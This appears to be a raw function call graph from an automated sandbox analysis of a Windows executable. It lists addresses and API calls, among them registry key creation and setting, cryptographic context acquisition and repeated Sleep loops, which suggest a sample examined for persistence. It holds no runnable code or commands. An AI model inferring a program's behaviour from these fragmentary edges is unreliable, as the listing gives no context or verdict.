409f97 42 API calls 40744->42309 42310 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40744->42310 42311 4092d0 40744->42311 42316 401e20 40744->42316 40747 406230 40751 402430 43 API calls 40747->40751 40750 4062fa 40748->40750 40749 40628d 40752 402430 43 API calls 40749->40752 40755 402360 39 API calls 40750->40755 40754 406240 40751->40754 40753 40629d 40752->40753 42340 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40753->42340 42335 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40754->42335 40760 40630e 40755->40760 42332 408c10 43 API calls 40756->42332 40761 4063e4 40760->40761 40762 406316 40760->40762 42353 407260 53 API calls 2 library calls 40761->42353 42345 406f40 53 API calls 2 library calls 40762->42345 40763->40743 40764 4062a6 40769 402360 39 API calls 40764->40769 40765 4061aa 40771 402360 39 API calls 40765->40771 40766 406249 40772 402360 39 API calls 40766->40772 42409 403c20 40767->42409 40775 4062ae 40769->40775 40777 4061b2 40771->40777 40778 406251 40772->40778 40774 40631b 40786 402430 43 API calls 40774->40786 42341 406e40 53 API calls 2 library calls 40775->42341 40776 4063e9 40787 402430 43 API calls 40776->40787 40781 402360 39 API calls 40777->40781 42336 406d30 53 API calls 2 library calls 40778->42336 40784 4061ba 40781->40784 40783 4062b3 40793 402430 43 API calls 40783->40793 42333 4017d0 CoUninitialize 40784->42333 40785 406256 40791 402430 43 API calls 40785->40791 40789 40632b 40786->40789 40790 4063f9 40787->40790 42346 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40789->42346 40800 402360 39 API calls 40790->40800 40794 406266 40791->40794 40796 4062c3 40793->40796 42337 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40794->42337 40795 406334 40798 402360 39 API calls 40795->40798 42342 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40796->42342 40802 40633c 40798->40802 40804 40640d 40800->40804 40801 40626f 40805 402360 39 API calls 40801->40805 42347 406fc0 53 API calls 2 library calls 40802->42347 40803 4062cc 40807 402360 39 API calls 40803->40807 40990 4064ce 40804->40990 42354 4072e0 53 API calls 2 library calls 40804->42354 40810 406277 40805->40810 40812 4062d4 40807->40812 42338 408c10 43 API calls 40810->42338 40811 406341 40817 402430 43 API calls 40811->40817 42343 408c10 43 API calls 40812->42343 40813 40641a 40820 402430 43 API calls 40813->40820 40814 4064d8 40821 402430 43 API calls 40814->40821 40818 406351 40817->40818 42348 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40818->42348 40819 40686e 41183 401770 40819->41183 40825 40642a 40820->40825 40826 4064e8 40821->40826 42355 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40825->42355 40836 402360 39 API calls 40826->40836 40827 40635a 40830 402360 39 API calls 40827->40830 40828 406881 41187 408380 40828->41187 40833 406362 40830->40833 40832 406433 40835 402360 39 API calls 40832->40835 42349 407040 53 API calls 2 library calls 40833->42349 40834 40688a 40843 402430 43 API calls 40834->40843 40838 40643b 40835->40838 40839 4064fc 40836->40839 42356 407360 53 API calls 2 library calls 40838->42356 41064 4065e3 40839->41064 42363 407680 53 API calls 2 library calls 40839->42363 40840 406367 40849 402430 43 API calls 40840->40849 40847 40689d 40843->40847 40844 406440 40853 402430 43 API calls 40844->40853 40846 4065ed 40855 402430 43 API calls 40846->40855 41197 408300 40847->41197 40848 406509 40854 402430 43 API calls 40848->40854 40851 406377 40849->40851 40863 402360 39 API calls 40851->40863 40852 4068a8 40860 402430 43 API calls 40852->40860 40856 406450 40853->40856 40858 406519 40854->40858 40859 4065fd 40855->40859 42357 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40856->42357 42364 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40858->42364 40868 402360 39 API calls 40859->40868 40864 4068bb 40860->40864 40861 406459 40865 402360 39 API calls 40861->40865 40867 40638b 40863->40867 41207 408260 40864->41207 40870 406461 40865->40870 40866 406522 40871 402360 39 API calls 40866->40871 40872 4063ac 40867->40872 40873 40638f 40867->40873 40875 406611 40868->40875 42358 4073e0 53 API calls 2 library calls 40870->42358 40878 40652a 40871->40878 42351 407150 53 API calls 2 library calls 40872->42351 42350 4070d0 53 API calls 2 library calls 40873->42350 40881 406693 40875->40881 40882 406615 40875->40882 40876 4068c6 40891 402430 43 API calls 40876->40891 42365 407700 53 API calls 2 library calls 40878->42365 40880 406394 40892 402430 43 API calls 40880->40892 42380 407c40 53 API calls 2 library calls 40881->42380 42374 407ab0 53 API calls 2 library calls 40882->42374 40883 406466 40894 402430 43 API calls 40883->40894 40885 4063b1 40895 402430 43 API calls 40885->40895 40888 40652f 40898 402430 43 API calls 40888->40898 40889 406698 40900 402430 43 API calls 40889->40900 40890 40661a 40901 402430 43 API calls 40890->40901 40893 4068d9 40891->40893 41079 4063a4 40892->41079 41217 408d60 40893->41217 40897 406476 40894->40897 40899 4063c1 40895->40899 40912 402360 39 API calls 40897->40912 40903 40653f 40898->40903 40914 402360 39 API calls 40899->40914 40905 4066a8 40900->40905 40906 40662a 40901->40906 42366 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40903->42366 40921 402360 39 API calls 40905->40921 42375 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40906->42375 40909 406855 40916 402360 39 API calls 40909->40916 41021 406283 40909->41021 40911 406906 41225 408e70 40911->41225 40919 40648a 40912->40919 40913 406548 40920 402360 39 API calls 40913->40920 40915 4063d5 40914->40915 40915->41021 42352 4071e0 53 API calls 2 library calls 40915->42352 40916->41021 40917 406633 40922 402360 39 API calls 40917->40922 40924 406498 40919->40924 40925 40648e 40919->40925 40926 406550 40920->40926 40930 4066bc 40921->40930 40931 40663b 40922->40931 42360 4074f0 53 API calls 2 library calls 40924->42360 42359 407470 53 API calls 2 library calls 40925->42359 42367 407780 53 API calls 2 library calls 40926->42367 40937 4066c0 40930->40937 40938 40673e 40930->40938 42376 407b30 53 API calls 2 library calls 40931->42376 40932 408dc0 43 API calls 40934 406933 40932->40934 40940 408e70 43 API calls 40934->40940 40935 406555 40947 402430 43 API calls 40935->40947 40936 40649d 40948 402430 43 API calls 40936->40948 42381 407cd0 53 API calls 2 library calls 40937->42381 42387 407e50 53 API calls 2 library calls 40938->42387 40944 406948 40940->40944 40943 406640 40949 402430 43 API calls 40943->40949 40946 408dc0 43 API calls 40944->40946 40945 4066c5 40954 402430 43 API calls 40945->40954 40950 406960 40946->40950 40951 406565 40947->40951 40958 4064ad 40948->40958 40955 406650 40949->40955 40956 402360 39 API calls 40950->40956 42368 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40951->42368 40952 406743 40953 402430 43 API calls 40952->40953 40959 406753 40953->40959 40960 4066d5 40954->40960 42377 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40955->42377 40962 40696e 40956->40962 40968 402360 39 API calls 40958->40968 40974 402360 39 API calls 40959->40974 42382 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40960->42382 40966 402360 39 API calls 40962->40966 40963 40656e 40967 402360 39 API calls 40963->40967 40965 406659 40970 402360 39 API calls 40965->40970 40971 406979 40966->40971 40972 406576 40967->40972 40973 4064c1 40968->40973 40969 4066de 40975 402360 39 API calls 40969->40975 40976 406661 40970->40976 40977 402360 39 API calls 40971->40977 42369 407800 53 API calls 2 library calls 40972->42369 40973->41021 42361 407580 53 API calls 2 library calls 40973->42361 40979 406767 40974->40979 40980 4066e6 40975->40980 42378 407bc0 53 API calls 2 library calls 40976->42378 40982 406984 40977->40982 40985 40676b 40979->40985 40986 4067be 40979->40986 42383 407d50 53 API calls 2 library calls 40980->42383 40989 402360 39 API calls 40982->40989 40983 40657b 40997 402430 43 API calls 40983->40997 42388 407ee0 53 API calls 2 library calls 40985->42388 42393 408060 53 API calls 2 library calls 40986->42393 40988 406666 40999 402430 43 API calls 40988->40999 40993 40698f 40989->40993 42362 407600 53 API calls 2 library calls 40990->42362 40992 4066eb 41002 402430 43 API calls 40992->41002 40996 402360 39 API calls 40993->40996 40995 406770 41007 402430 43 API calls 40995->41007 41000 40699a 40996->41000 41001 40658b 40997->41001 40998 4067c3 41006 402430 43 API calls 40998->41006 41003 406676 40999->41003 41004 402360 39 API calls 41000->41004 41011 402360 39 API calls 41001->41011 41008 4066fb 41002->41008 42379 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41003->42379 41005 4069a5 41004->41005 41010 402360 39 API calls 41005->41010 41012 4067d3 41006->41012 41013 406780 41007->41013 42384 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41008->42384 41016 4069b0 41010->41016 41017 40659f 41011->41017 41028 402360 39 API calls 41012->41028 42389 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41013->42389 41015 40667f 41020 402360 39 API calls 41015->41020 41022 402360 39 API calls 41016->41022 41023 4065a8 41017->41023 42370 407890 53 API calls 2 library calls 41017->42370 41019 406704 41025 402360 39 API calls 41019->41025 41020->41021 41021->40819 42400 402330 43 API calls 41021->42400 41066 4069bf 41022->41066 42371 407910 53 API calls 2 library calls 41023->42371 41024 406789 41030 402360 39 API calls 41024->41030 41026 40670c 41025->41026 42385 407dd0 53 API calls 2 library calls 41026->42385 41033 4067e7 41028->41033 41031 406791 41030->41031 42390 407f60 53 API calls 2 library calls 41031->42390 41033->41021 42394 4080e0 53 API calls 2 library calls 41033->42394 41034 4065b2 41040 402430 43 API calls 41034->41040 41036 406711 41041 402430 43 API calls 41036->41041 41037 406796 41043 402430 43 API calls 41037->41043 41039 4067f0 41048 402430 43 API calls 41039->41048 41042 4065c2 41040->41042 41044 406721 41041->41044 41049 402360 39 API calls 41042->41049 41046 4067a6 41043->41046 42386 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41044->42386 41045 406a1e Sleep 41045->41066 42391 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41046->42391 41052 406800 41048->41052 41053 4065d6 41049->41053 41051 40672a 41055 402360 39 API calls 41051->41055 42395 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41052->42395 41053->41021 42372 4079a0 53 API calls 2 library calls 41053->42372 41054 4067af 41059 402360 39 API calls 41054->41059 41055->41021 41056 402430 43 API calls 41056->41066 41058 406809 41060 402360 39 API calls 41058->41060 41062 4067b7 41059->41062 41063 406811 41060->41063 42392 407fe0 53 API calls 2 library calls 41062->42392 42396 408160 53 API calls 2 library calls 41063->42396 42373 407a20 53 API calls 2 library calls 41064->42373 41066->41045 41066->41056 41067 406a27 41066->41067 41073 406a16 41066->41073 41070 402360 39 API calls 41067->41070 41069 406816 41077 402430 43 API calls 41069->41077 41071 406a2f 41070->41071 41228 408c40 41071->41228 41072 4067bc 41075 402430 43 API calls 41072->41075 41076 402360 39 API calls 41073->41076 41075->41079 41076->41045 41080 406826 41077->41080 41078 406a40 41081 408c40 43 API calls 41078->41081 42399 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41079->42399 42397 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41080->42397 41083 406a59 41081->41083 41085 408c40 43 API calls 41083->41085 41084 40682f 41086 402360 39 API calls 41084->41086 41087 406a6c 41085->41087 41089 406837 41086->41089 41245 404f50 41087->41245 42398 4081e0 53 API calls 2 library calls 41089->42398 41090 406a81 41092 406aa1 41090->41092 41093 408c40 43 API calls 41090->41093 42401 408410 53 API calls 2 library calls 41092->42401 41095 406a9c 41093->41095 41728 403d20 41095->41728 41096 406aa9 41098 402430 43 API calls 41096->41098 41099 406ab9 41098->41099 41100 402360 39 API calls 41099->41100 41101 406acd 41100->41101 41102 406b70 41101->41102 41103 401770 41 API calls 41101->41103 42404 408580 53 API calls 2 library calls 41102->42404 41105 406ae8 41103->41105 42402 4084a0 53 API calls 2 library calls 41105->42402 41106 406b75 41109 402430 43 API calls 41106->41109 41108 406af1 41111 402430 43 API calls 41108->41111 41110 406b88 41109->41110 41112 402360 39 API calls 41110->41112 41115 406b01 41111->41115 41113 406b9f 41112->41113 41113->40767 41114 406ba3 41113->41114 42405 4086f0 53 API calls 2 library calls 41114->42405 41118 406b37 41115->41118 41119 406b28 Sleep 41115->41119 41117 406bb0 41122 402430 43 API calls 41117->41122 41123 402430 43 API calls 41118->41123 41119->41115 41120 406b35 41119->41120 41121 406b59 41120->41121 41124 402360 39 API calls 41121->41124 41125 406bbf 41122->41125 41126 406b4e 41123->41126 41127 406b61 41124->41127 42406 408670 53 API calls 2 library calls 41125->42406 41129 402360 39 API calls 41126->41129 42403 4017d0 CoUninitialize 41127->42403 41129->41121 41131 406bd3 41132 402430 43 API calls 41131->41132 41133 406be2 41132->41133 42407 408610 53 API calls __Init_thread_footer 41133->42407 41135 406bf0 41136 402430 43 API calls 41135->41136 41137 406bff 41136->41137 42408 4058d0 247 API calls 5 library calls 41137->42408 41139 406c08 41139->40767 41141 41081b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 41140->41141 41141->40711 42412 4128a2 GetLastError 41142->42412 41146 4107c0 41145->41146 41148 4107ca 41145->41148 42456 4106b4 43 API calls 2 library calls 41146->42456 41148->40744 41160 403ad1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41149->41160 41150 408c40 43 API calls 41150->41160 41151 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 41153 403c13 41151->41153 41153->40744 41154 403b6d 41155 403bb1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41154->41155 41156 403c17 41154->41156 41155->41151 41158 40cfaf 39 API calls 41156->41158 41157 403b55 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41157->41155 41157->41156 42457 408f40 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41157->42457 41159 403c1c 41158->41159 41160->41150 41160->41156 41160->41157 41162 406c4c 41161->41162 41170 406c7e 41161->41170 42458 409c85 6 API calls 41162->42458 41163 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 41165 406c90 41163->41165 41165->40725 41166 406c56 41166->41170 42459 409f97 42 API calls 41166->42459 41168 406c74 42460 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41168->42460 41170->41163 41172 402453 41171->41172 41173 402730 43 API calls 41172->41173 41174 402465 41173->41174 41174->40730 41176 40236b 41175->41176 41177 402386 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41175->41177 41176->41177 41178 40cfaf 39 API calls 41176->41178 41177->40734 41179 4023aa 41178->41179 41180 4023e1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41179->41180 41181 40cfaf 39 API calls 41179->41181 41180->40734 41182 40242c 41181->41182 41184 401783 CallUnexpected 41183->41184 41185 409b4a 41 API calls 41184->41185 41186 40179a CallUnexpected 41185->41186 41186->40828 41188 4083ee 41187->41188 41189 4083b2 41187->41189 41190 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 41188->41190 42461 409c85 6 API calls 41189->42461 41192 408400 41190->41192 41192->40834 41193 4083bc 41193->41188 42462 409f97 42 API calls 41193->42462 41195 4083e4 42463 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41195->42463 41198 40835e 41197->41198 41199 40832c 41197->41199 41200 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 41198->41200 42464 409c85 6 API calls 41199->42464 41202 408370 41200->41202 41202->40852 41203 408336 41203->41198 42465 409f97 42 API calls 41203->42465 41205 408354 42466 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41205->42466 41208 4082e2 41207->41208 41209 40829d 41207->41209 41211 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 41208->41211 42467 409c85 6 API calls 41209->42467 41213 4082f5 41211->41213 41212 4082a7 41212->41208 42468 409f97 42 API calls 41212->42468 41213->40876 41215 4082d8 42469 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41215->42469 41218 408d74 41217->41218 41219 4092d0 43 API calls 41218->41219 41220 4068ee 41219->41220 41221 408dc0 41220->41221 41222 408ddb 41221->41222 41224 408def __InternalCxxFrameHandler 41222->41224 42470 402810 43 API calls 3 library calls 41222->42470 41224->40911 42471 4090f0 41225->42471 41227 40691b 41227->40932 41229 408c6a 41228->41229 41230 408d2d 41229->41230 41234 408c7e 41229->41234 42494 4015d0 43 API calls 3 library calls 41230->42494 41232 408c8a __InternalCxxFrameHandler 41232->41078 41233 408d32 42495 401530 41 API calls 3 library calls 41233->42495 41234->41232 41236 408cd8 41234->41236 41237 408cf9 41234->41237 41236->41233 41239 408cdf 41236->41239 41244 408cee __InternalCxxFrameHandler 41237->41244 42493 401530 41 API calls 4 library calls 41237->42493 41238 408ce5 41240 40cfaf 39 API calls 41238->41240 41238->41244 42492 401530 41 API calls 4 library calls 41239->42492 41242 408d3c 41240->41242 41244->41078 41246 4107e2 GetSystemTimeAsFileTime 41245->41246 41247 404f9f 41246->41247 41248 4106a2 39 API calls 41247->41248 41249 404fa8 CallUnexpected 41248->41249 41250 409b4a 41 API calls 41249->41250 41257 404ffc CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41250->41257 41253 402730 43 API calls 41253->41257 41254 4092d0 43 API calls 41254->41257 41256 401e20 44 API calls 41256->41257 41257->41253 41257->41254 41257->41256 41258 4052d0 Sleep 41257->41258 41259 4058bd 41257->41259 41266 4052e0 CallUnexpected 41257->41266 42496 402470 41257->42496 42637 409c85 6 API calls 41257->42637 42638 409f97 42 API calls 41257->42638 42639 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41257->42639 41258->41257 41260 40cfaf 39 API calls 41259->41260 41261 4058c2 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 41260->41261 41264 405964 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41261->41264 41265 405a22 41264->41265 41267 405a0a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41264->41267 41269 40cfaf 39 API calls 41265->41269 41272 409b4a 41 API calls 41266->41272 41268 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 41267->41268 41270 405a1e 41268->41270 41271 405a27 41269->41271 41270->41090 41273 4107e2 GetSystemTimeAsFileTime 41271->41273 41303 405315 __InternalCxxFrameHandler CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41272->41303 41274 405a7f 41273->41274 41275 4106a2 39 API calls 41274->41275 41276 405a88 Sleep 41275->41276 41277 402730 43 API calls 41276->41277 41287 405aba 41277->41287 41279 402730 43 API calls 41279->41303 41280 402730 43 API calls 41309 405c80 __InternalCxxFrameHandler CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41280->41309 41282 405bc6 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41282->41280 41282->41309 41283 4092d0 43 API calls 41283->41303 41286 401e20 44 API calls 41286->41303 41287->41282 42643 4025a0 41 API calls 41287->42643 41289 403a90 43 API calls 41289->41309 41290 4107b2 43 API calls 41290->41309 41291 40fb0d 15 API calls ___std_exception_copy 41291->41303 41292 409b4a 41 API calls 41292->41309 41293 4061c5 41296 406c20 53 API calls 41293->41296 41294 405682 41295 40577c CoUninitialize 41294->41295 41300 405792 41295->41300 41298 4061ec 41296->41298 41297 408c40 43 API calls 41297->41303 41304 402430 43 API calls 41298->41304 41306 4057ae CoUninitialize 41300->41306 41302 402730 43 API calls 41302->41309 41303->41259 41303->41279 41303->41283 41303->41286 41303->41291 41303->41294 41303->41297 41327 403410 41 API calls 41303->41327 41357 405687 41303->41357 42511 4035b0 CryptAcquireContextW 41303->42511 42535 402ec0 41303->42535 42640 409c85 6 API calls 41303->42640 42641 409f97 42 API calls 41303->42641 42642 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41303->42642 41308 4061fc 41304->41308 41317 4057bb std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41306->41317 41312 402360 39 API calls 41308->41312 41309->41289 41309->41290 41309->41292 41309->41293 41309->41302 41310 4092d0 43 API calls 41309->41310 41319 401e20 44 API calls 41309->41319 41321 40cfaf 39 API calls 41309->41321 41326 406192 Sleep 41309->41326 41339 40619e 41309->41339 41346 406188 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41309->41346 41350 406c0b 41309->41350 42644 4025a0 41 API calls 41309->42644 42645 409c85 6 API calls 41309->42645 42646 409f97 42 API calls 41309->42646 42647 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41309->42647 41310->41309 41314 406210 41312->41314 41313 405895 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41318 4099d7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 41313->41318 41315 4062e5 41314->41315 41316 406218 41314->41316 42660 406ec0 53 API calls 2 library calls 41315->42660 41324 406288 41316->41324 41325 40622b 41316->41325 41317->41259 41317->41313 41322 4058b6 41318->41322 41319->41309 41321->41309 41322->41090 41323 4062ea 41331 402430 43 API calls 41323->41331 42655 406db0 53 API calls 2 library calls 41324->42655 42650 406ca0 53 API calls 2 library calls 41325->42650 41326->41309 41327->41303 41330 406230 41334 402430 43 API calls 41330->41334 41333 4062fa 41331->41333 41332 40628d 41335 402430 43 API calls 41332->41335 41338 402360 39 API calls 41333->41338 41337 406240 41334->41337 41336 40629d 41335->41336 42656 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41336->42656 42651 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41337->42651 41343 40630e 41338->41343 42648 408c10 43 API calls 41339->42648 41344 4063e4 41343->41344 41345 406316 41343->41345 42669 407260 53 API calls 2 library calls 41344->42669 42661 406f40 53 API calls 2 library calls 41345->42661 41346->41326 41347 4062a6 41352 402360 39 API calls 41347->41352 41348 4061aa 41354 402360 39 API calls 41348->41354 41349 406249 41355 402360 39 API calls 41349->41355 41356 403c20 21 API calls 41350->41356 41360 4062ae 41352->41360 41362 4061b2 41354->41362 41363 406251 41355->41363 41364 406c10 41356->41364 41359 40571b Sleep 41357->41359 41368 40574a Sleep 41357->41368 42591 10001f20 41357->42591 42634 100010a3 41357->42634 41358 40631b 41372 402430 43 API calls 41358->41372 41359->41294 41359->41357 42657 406e40 53 API calls 2 library calls 41360->42657 41361 4063e9 41373 402430 43 API calls 41361->41373 41366 402360 39 API calls 41362->41366 42652 406d30 53 API calls 2 library calls 41363->42652 41370 4061ba 41366->41370 41368->41294 41369 4062b3 41379 402430 43 API calls 41369->41379 42649 4017d0 CoUninitialize 41370->42649 41371 406256 41377 402430 43 API calls 41371->41377 41375 40632b 41372->41375 41376 4063f9 41373->41376 42662 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41375->42662 41386 402360 39 API calls 41376->41386 41380 406266 41377->41380 41382 4062c3 41379->41382 42653 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41380->42653 41381 406334 41384 402360 39 API calls 41381->41384 42658 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41382->42658 41388 40633c 41384->41388 41390 40640d 41386->41390 41387 40626f 41391 402360 39 API calls 41387->41391 42663 406fc0 53 API calls 2 library calls 41388->42663 41389 4062cc 41393 402360 39 API calls 41389->41393 41394 4064ce 41390->41394 42670 4072e0 53 API calls 2 library calls 41390->42670 41397 406277 41391->41397 41399 4062d4 41393->41399 42678 407600 53 API calls 2 library calls 41394->42678 42654 408c10 43 API calls 41397->42654 41398 406341 41405 402430 43 API calls 41398->41405 42659 408c10 43 API calls 41399->42659 41400 40641a 41408 402430 43 API calls 41400->41408 41401 4064d8 41409 402430 43 API calls 41401->41409 41404 406283 41407 40686e 41404->41407 42716 402330 43 API calls 41404->42716 41406 406351 41405->41406 42664 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41406->42664 41412 401770 41 API calls 41407->41412 41413 40642a 41408->41413 41414 4064e8 41409->41414 41416 406881 41412->41416 42671 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41413->42671 41424 402360 39 API calls 41414->41424 41415 40635a 41418 402360 39 API calls 41415->41418 41419 408380 53 API calls 41416->41419 41421 406362 41418->41421 41422 40688a 41419->41422 41420 406433 41423 402360 39 API calls 41420->41423 42665 407040 53 API calls 2 library calls 41421->42665 41432 402430 43 API calls 41422->41432 41426 40643b 41423->41426 41427 4064fc 41424->41427 42672 407360 53 API calls 2 library calls 41426->42672 41430 4065e3 41427->41430 42679 407680 53 API calls 2 library calls 41427->42679 41428 406367 41438 402430 43 API calls 41428->41438 42689 407a20 53 API calls 2 library calls 41430->42689 41436 40689d 41432->41436 41433 406440 41442 402430 43 API calls 41433->41442 41435 4065ed 41444 402430 43 API calls 41435->41444 41439 408300 53 API calls 41436->41439 41437 406509 41443 402430 43 API calls 41437->41443 41440 406377 41438->41440 41441 4068a8 41439->41441 41452 402360 39 API calls 41440->41452 41449 402430 43 API calls 41441->41449 41445 406450 41442->41445 41447 406519 41443->41447 41448 4065fd 41444->41448 42673 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41445->42673 42680 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41447->42680 41457 402360 39 API calls 41448->41457 41453 4068bb 41449->41453 41450 406459 41454 402360 39 API calls 41450->41454 41456 40638b 41452->41456 41458 408260 53 API calls 41453->41458 41459 406461 41454->41459 41455 406522 41460 402360 39 API calls 41455->41460 41461 4063ac 41456->41461 41462 40638f 41456->41462 41464 406611 41457->41464 41465 4068c6 41458->41465 42674 4073e0 53 API calls 2 library calls 41459->42674 41467 40652a 41460->41467 42667 407150 53 API calls 2 library calls 41461->42667 42666 4070d0 53 API calls 2 library calls 41462->42666 41470 406693 41464->41470 41471 406615 41464->41471 41480 402430 43 API calls 41465->41480 42681 407700 53 API calls 2 library calls 41467->42681 41469 406394 41481 402430 43 API calls 41469->41481 42696 407c40 53 API calls 2 library calls 41470->42696 42690 407ab0 53 API calls 2 library calls 41471->42690 41472 406466 41483 402430 43 API calls 41472->41483 41474 4063b1 41484 402430 43 API calls 41474->41484 41477 40652f 41488 402430 43 API calls 41477->41488 41478 406698 41490 402430 43 API calls 41478->41490 41479 40661a 41491 402430 43 API calls 41479->41491 41482 4068d9 41480->41482 41485 4063a4 41481->41485 41486 408d60 43 API calls 41482->41486 41487 406476 41483->41487 41489 4063c1 41484->41489 42715 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41485->42715 41492 4068ee 41486->41492 41502 402360 39 API calls 41487->41502 41493 40653f 41488->41493 41504 402360 39 API calls 41489->41504 41495 4066a8 41490->41495 41496 40662a 41491->41496 41497 408dc0 43 API calls 41492->41497 42682 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41493->42682 41511 402360 39 API calls 41495->41511 42691 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41496->42691 41501 406906 41497->41501 41499 406855 41499->41404 41506 402360 39 API calls 41499->41506 41508 408e70 43 API calls 41501->41508 41509 40648a 41502->41509 41503 406548 41510 402360 39 API calls 41503->41510 41505 4063d5 41504->41505 41505->41404 42668 4071e0 53 API calls 2 library calls 41505->42668 41506->41404 41507 406633 41512 402360 39 API calls 41507->41512 41513 40691b 41508->41513 41514 406498 41509->41514 41515 40648e 41509->41515 41516 406550 41510->41516 41520 4066bc 41511->41520 41521 40663b 41512->41521 41522 408dc0 43 API calls 41513->41522 42676 4074f0 53 API calls 2 library calls 41514->42676 42675 407470 53 API calls 2 library calls 41515->42675 42683 407780 53 API calls 2 library calls 41516->42683 41527 4066c0 41520->41527 41528 40673e 41520->41528 42692 407b30 53 API calls 2 library calls 41521->42692 41524 406933 41522->41524 41530 408e70 43 API calls 41524->41530 41525 406555 41538 402430 43 API calls 41525->41538 41526 40649d 41539 402430 43 API calls 41526->41539 42697 407cd0 53 API calls 2 library calls 41527->42697 42703 407e50 53 API calls 2 library calls 41528->42703 41534 406948 41530->41534 41533 406640 41540 402430 43 API calls 41533->41540 41537 408dc0 43 API calls 41534->41537 41535 406743 41544 402430 43 API calls 41535->41544 41536 4066c5 41545 402430 43 API calls 41536->41545 41541 406960 41537->41541 41542 406565 41538->41542 41543 4064ad 41539->41543 41546 406650 41540->41546 41547 402360 39 API calls 41541->41547 42684 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41542->42684 41558 402360 39 API calls 41543->41558 41549 406753 41544->41549 41550 4066d5 41545->41550 42693 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41546->42693 41552 40696e 41547->41552 41564 402360 39 API calls 41549->41564 42698 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41550->42698 41556 402360 39 API 